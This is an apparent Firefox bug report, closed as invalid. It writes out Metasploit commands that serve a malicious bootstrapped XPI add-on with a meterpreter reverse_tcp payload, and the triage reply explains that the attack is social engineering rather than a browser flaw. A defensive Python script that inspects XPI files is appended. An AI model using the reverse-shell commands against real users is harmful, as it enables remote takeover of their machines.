Firefox Addon Bootstrap Exploit

RESOLVED INVALID

Status

Firefox
Untriaged
RESOLVED INVALID
6 years ago
6 years ago

People

(Reporter: skiller.rs1, Unassigned)

Tracking

15 Branch
x86_64
Windows 7

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

6 years ago
Created attachment 657948
a.png

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Build ID: 20120824154833

Steps to reproduce:

Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox.


Code:
msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon

msf>set payload windows/meterpreter/reverse_tcp

msf>set lport 81

msf> set lhost 0.0.0.0

msf> set srvhost  yourip

msf> show targets

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Linux x86 (Native Payload)
   3   Mac OS X PPC (Native Payload)
   4   Mac OS X x86 (Native Payload)

msf> set target 1

msf > exploit


Actual results:

I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions.


Expected results:

The exploit shouldn't have existed in the first place.

This is not security sensitive.
This is a module that creates a malicious XPI that is an attempt to get the user to install a crafted add-on.
Since add-ons can have chrome privileges, they can do just about anything.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID
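
A defender-side check for the kind of file discussed above, as an added example that is not part of the original bug report or any Mozilla code: it inspects an XPI without installing it and reports whether it declares itself a bootstrapped add-on and whether it bundles native executables. The `install.rdf` / `bootstrap.js` layout is that of legacy bootstrapped add-ons; the function names and the magic-byte heuristic are assumptions of this example, and the sample XPI is constructed in memory.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

EM_NS = "http://www.mozilla.org/2004/em-rdf#"
BOOTSTRAP = "{%s}bootstrap" % EM_NS
# Assumed heuristic: leading bytes of PE, ELF and Mach-O (32/64-bit) files.
NATIVE_MAGIC = (b"MZ", b"\x7fELF", b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe")


def declares_bootstrap(install_rdf):
    """True if install.rdf sets em:bootstrap to true (element or attribute form)."""
    try:
        root = ET.fromstring(install_rdf)
    except ET.ParseError:
        return False
    for node in root.iter():
        value = node.text if node.tag == BOOTSTRAP else node.attrib.get(BOOTSTRAP)
        if (value or "").strip().lower() == "true":
            return True
    return False


def triage_xpi(data):
    """Summarise what an XPI would bring with it, without installing it."""
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        names = [n for n in xpi.namelist() if not n.endswith("/")]
        rdf = xpi.read("install.rdf") if "install.rdf" in names else b""
        native = []
        for name in names:
            with xpi.open(name) as member:  # read only the header bytes
                if member.read(4).startswith(NATIVE_MAGIC):
                    native.append(name)
    return {"bootstrapped": declares_bootstrap(rdf),
            "has_bootstrap_js": "bootstrap.js" in names,
            "native_files": sorted(native)}


def make_sample_xpi(bootstrap, extra_files):
    """Constructed sample: a minimal XPI built in memory (no real add-on)."""
    rdf = ('<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="%s">'
           '<Description about="urn:mozilla:install-manifest">'
           '<em:id>sample@example.invalid</em:id>'
           '<em:bootstrap>%s</em:bootstrap></Description></RDF>'
           % (EM_NS, "true" if bootstrap else "false"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as xpi:
        xpi.writestr("install.rdf", rdf)
        for name, content in extra_files.items():
            xpi.writestr(name, content)
    return buf.getvalue()
```

A result with `bootstrapped` true and a non-empty `native_files` list is a reason to block the file or hand it to analysis before any user is asked to approve the install prompt.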